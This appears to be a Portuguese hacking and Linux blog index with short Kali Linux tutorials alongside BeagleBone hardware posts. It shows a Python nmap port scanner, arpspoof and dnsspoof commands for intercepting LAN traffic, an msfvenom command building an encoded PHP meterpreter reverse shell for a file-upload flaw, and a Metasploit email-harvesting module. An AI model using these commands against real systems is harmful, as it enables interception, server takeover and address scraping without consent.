PasteRock Kali Linux

0

Boas Users!

 

Ja mostrei essa técnica aqui, mas hoje irei mostrar de um modo diferente.

 

 

PasteRock LINK

By User777

Prefiro Linux

0

Boas Users!

 

Antes de mais nada, venho pedir desculpa pela minha ausência e a do Thiago no Prefiro Linux, o ano está acabando, 2017 será um ano de projetos novos, e novidades, aguardem…

“Tudo o que um sonho precisa para ser realizado é alguém que acredite que ele possa ser realizado.”

 

Feliz Natal e um Próspero ano Novo!!!!!

By user777

 

 

Scaneando portas com Python3 “Kali Linux”

0

Boas Users!

hoje vou mostrar como fazer um script com Python para scanear portas.

 

código:

  1. import nmap
  2. = nmap.PortScanner()
  3. alvo = input(“Alvo: “)
  4. porta = input(“Porta: “)
  5. N.scan(alvo, porta)
  6. for host in N.all_hosts():
  7.     print(“########################”)
  8.     print(‘[+]Host : %s (%s)’ % (host, N[host].hostname()))
  9.     print(‘[+]State : %s’ % N[host].state())
  10.     for proto in N[host].all_protocols():
  11.         print(‘########################’)
  12.         print(‘[+]Protocolo : %s’ % proto)
  13.         lport = N[host][proto].keys()
  14.         lport = list(lport)
  15.         lport.sort()
  16.         for port in lport:
  17.             print (‘[+]porta : %s\testado : %s’ % (port, N[host][proto][port][‘state’]))

 

[ x ]
 

By user777!

Interagindo com “Você”

0

Boas Users!

Bom primeiramente, queria falar que ficamos afastado por mais de um mês, por motivos pessoais, mas que estamos de volta e com bastante novidades.

DnsSpoof e ArpSpoof kali Linux

0

Boas Users!

Vamos falar um pouco hoje de dnsspoof e arpspoof,  técnica utilizada em redes cabeadas e wireless que permite ao atacante capturar informações

Comandos:

# arpspoof -i eth0 -t 192.168.1.119 -r 192.168.1.120
# dnsspoof -i eth0
# dnsspoof -i eth0 -f dns.txt

Isso foi uma pequena demostração  do que o dnsspoof e arpspoof é capaz de fazer.

 

By user777

 

 

Explorando Vulnerabilidade de “upload” com BURP “kali linux”

0

Boas users!

Irei mostrar como explorar uma vulnerabilidade, de um determinado servidor de upload com o BURP.

Comando:

# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=4444 -e      php/base64 -f raw > /root/upload.php

By user777

 

QUICK-TIP: Saleae Logic, analisador lógico de baixo custo com suporte LINUX

0

Olá pessoal hoje venho apresentar a vocês o saleae logic um analisador lógico de “baixo custo” com suporte para linux!

Usando rede wifi com Beagle Bone Green.

0

Olá pessoal, meu nome é Filipe e hoje venho mostrar como utilizar rede wifi na BBG classica que no caso vem sem adaptador wireless.

Re-instalando o sistema operacional na BEAGLE BONE GREEN

0

Olá pessoal, meu nome é Filipe e venho hoje mostrar como re-instalar o sistema da BBG.

Após varias brincadeiras, apt-get install, remove e etc o sistema vira aquela anarquia, tem lighttpd + apache rodando, cheio de regras de roteamento que você não lembra que colocou, o rc.d ta uma loucura. Bom nessa hora o mais fácil é passar uma borracha e reinstalar o sistema novamente.

Coletando Endereços de Email’s com Kali Linux

0

Boas Users!

Vou mostrar como coletar, endereços de email’s de um determinado domínio.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Comandos usado:

# msfconsole

msfconsole= Framework criado por H.D.Moore, que serve para elaboração e execução de um repositório de exploits.

 

 

[ x ]
 

msf > use auxiliar/gather/search_email_collector

use auxiliar= Carregando o modulo email_collector

msf > set DOMAIN "domínio.com.br"

set DOMAIN= Selecionando o domínio

msn > run

run= Iniciando a coleta